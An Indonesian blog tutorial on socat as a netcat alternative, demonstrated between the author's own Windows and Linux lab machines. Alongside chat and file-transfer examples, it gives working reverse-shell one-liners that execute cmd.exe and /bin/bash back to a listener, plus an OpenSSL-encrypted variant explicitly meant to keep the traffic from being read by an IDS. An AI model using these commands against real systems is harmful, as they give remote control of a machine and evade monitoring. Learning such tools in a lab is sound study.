Skip to main content

SOCAT : Tools alternatif netcat

SOCAT

Socat adalah sebuah utilitas yang menghubungkan dua byte stream (byte stream) dua arah dan melakukan transfer data diantara mereka.
Socat mirip seperti netcat, tetapi memiliki tambahan fungsi yang lebih.
Sama seperti netcat, socat dasarnya bisa digunakan untuk melakukan chat antara kita dengan orang lain dengan perantara mesin.
Disini saya menggunakan 2 mesin. Windows dengan IP 10.20.20.2 dan Linux dengan IP 10.20.20.204.



Untuk command dasarnya seperti dibawah ini. saya akan menjadikan Linux sebagai servernya.

Server : socat -d -d - TCP4-LISTEN:1033 
Client : socat -d -d - TCP4:10.20.20.204:1033


Socat File Transfer 

Socat bisa juga digunakan untuk trasfer file. Commandnya sebagai berikut :

Pengirim Linux Socat Server:

socat TCP4-LISTEN:1033,fork file:file.linux.txt

Penerima Windows Socat Client:

socat TCP4:10.20.20.204:1033 file:dari.linux.txt,create
D:\Tools\socat-1.7.3.2-1-x86_64>more dari.linux.txt
File ini dikirim dari linux

Server atau client sama sama bisa melakukan mengirim atau menerima, tinggal disesuaikan saja. Kalau mau terima itu ditambahkan file:dari.linux.txt,create. Kalau mau kirim, ditambahkan ,fork file:file.linux.txt

Penerima Windows Socat Server

socat  -d -d TCP4-LISTEN:1433 file:powercat.ps1,create

Pengirim Linux Socat Client :

socat -d -d TCP:10.20.20.2:1433,fork file:powercat.ps1

Reverse Shell

Kita juga bisa menjalankan shell antara mesin dengan socat. Reverse Shell disini maksudnya, kita dapat meremote shell cmd di linux dengan socat, begitupun sebaliknya. Kita bisa juga menjalankan shell linux dengan socat di windows.
Jalankan dahulu Socat servernya. Untuk mengetes reverse shell Windows, jalankan command berikut di Linux, untuk reverse shell Linux jalankan command berikut di windows :

Menjalankan Socat Listener

socat -d -d - TCP4-LISTEN:1033 

Reverse Shell Windows : 

socat.exe TCP4:10.20.20.204:1033 EXEC:'cmd.exe',pipes



Reverse Shell Linux : 

socat TCP4:10.20.20.2:1033 EXEC:/bin/bash



Reverse Shell with SSL

Kita juga bisa menambahkan enkripsi dalam socat ini, khususnya ketika menjalankan reverse shell. Karena, ketika dalam suatu jaringan terdapat IDS, akan ketahuan apa yang dilakukan pada komunikasi socat ini, termasuk transfer file. Ketika kita manjalankan transfer file pun keliatan isi file yang ditransfer.

Berikut ini contoh hasil capture wireshark terhadap komunikasi yang dilakukan sebelumnya.




Disini kita akan membuat certificatenya dahulu. Biar lebih gampang, kita akan menjalankan server di Linux.

Eksekusi di Linux :
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 465 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem 
sudo socat -d -d - OPENSSL-LISTEN:8443,cert=bind_shell.pem,verify=0

Pada command diatas, kita harus menyatukan file .key dan .crt menjadi file .pem sesuai format yang diterima oleh socat.

Eksekusi di Windows :

socat  OPENSSL:10.20.20.204:8443,verify=0 EXEC:'cmd.exe',pipes

Eksekusi di Linux lainnyau ntuk reverse shell Linux: 

socat  OPENSSL:10.20.20.204:8443,verify=0 EXEC:/bin/bash 

Hasil capture wireshark:



loading...
Labels:

Comments

Post a Comment

Popular posts from this blog

Merepresentasikan Algoritma dengan Flowchart dan Pseudocode

  Merepresentasikan Algoritma dengan Flowchart Flowchart adalah jenis diagram (grafis tau simbolik) yang mewakili suatu algoritma atau proses-proses tertentu. Setiap langkah dalam algoritma diwakili oleh simbol yang sama atau berbeda dan berisi penjelasan singkat setiap langkah. Flowchart merepresentasikan algoritma dalam bentuk desain, simbol dan dijadikan dokumentasi dan kemudian dituangkan menjadi kode-kode program. Sebelum membuat flowchart, kita harus memahami unsur flowchart sebagai berikut : Input Percabangan ( biasanya menggunakan perintah if dan switch) Perulangan ( biasanya menggunakan perintah atau kode while, for, loop, each ) Output Flowchart biasanya digambar menggunakan beberapa simbol standar, namun tidak menutup opsi lain untuk menyertakan simbol-simbol di luar standar untuk digunakan jika memang diperlukan simbol tersebut di desain yang kita buat. Berikut ini simbol – simbol yang biasa digunakan dalam flowchart. Simbol simbol diatas adalah simbol dasar yang diguna...
Post a Comment
Read more

Contoh Soal Data dalam Sistem Bahasa Pemrograman R

  Tuliskan pernyataan R untuk membuat deret bilangan berikut : x = [-5 -4 -3 -2 -1 0 1 2 3] y = [5 4 3 2 1] z = [1000000 1166667 1333333 1500000 1666667 1833333 2000000] p = [9 9 9 5 5 5] q = [1 1 1 2 2 2 1 1 1 2 2 2] Jawaban : > x <- seq (from=-5,to=3,length=9) > x [1] -5 -4 -3 -2 -1 0 1 2 3 > y <- seq (from=5,to=1,length=5) > y [1] 5 4 3 2 1 > z <- seq (from=1000000,to=2000000,length=7) > z [1] 1000000 1166667 1333333 1500000 1666667 1833333 2000000 > p <- rep(c(9,5),each=3) > p [1] 9 9 9 5 5 5 > q <- rep(c(1,2,1,2),each=3) > q [1] 1 1 1 2 2 2 1 1 1 2 2 2 Tuliskan pernyataan R untuk membuat frame data siswa berikut : No Jurusan asal_daerah usia 1 Komputer Bogor 25 2 Fisika Bogor 25 3 Komputer Bandung 25 4 Fisika Bandung 25 5 Komputer Bogor 26 6 Fisika Bogor 26 7 Komputer Bandung 26 8 Fisika Bandung 26 Jawaban : > jurusan <- c("Komputer","Fisika","Komputer","Fisika","Komputer...
1 comment
Read more

Lab 8.8 Konfigurasi Log Analyzer Visited Pages dengan Awstats di Apache pada Centos7

Assalamu’alaikum wr.wb Pada kali ini ane ingin share cara monitoring dengan awstats. Awstats adalah sebuah tools untuk memantau visited pages pada webserver. Langsung saja kita konfigurasi 1. Install epel, karena awstats ini tidak ada pada repository centos, tetapi ada pada epel. Caranya adalah seperti dibawah ini   2. Kemudian install awstats 3. Awstats ini secara default membuat konfigurasi sesuai dengan hostname. Jika tidak sesuai Antara hostname dan web yang akan dibuatkan halaman awstatsnya, maka rename konfigurasi yang ada sesuai hostname menjadi nama domain anda tanpa menghilangkan format yang ada. [root@ct-ali ~]# mv /etc/awstats/awstats.ct-ali.alisofyan.com.conf /etc/awstats/awstats.www.alisofyan.com.conf 4. Konfigurasi awstats untuk webserver yang telah diatur [root@ct-ali ~]# vi /etc/awstats/awstats.www.alisofyan.com.conf Sesuaikan konfigurasi seperti dibawah ini dengan keadaan anda  dan ...
Post a Comment
Read more
loading...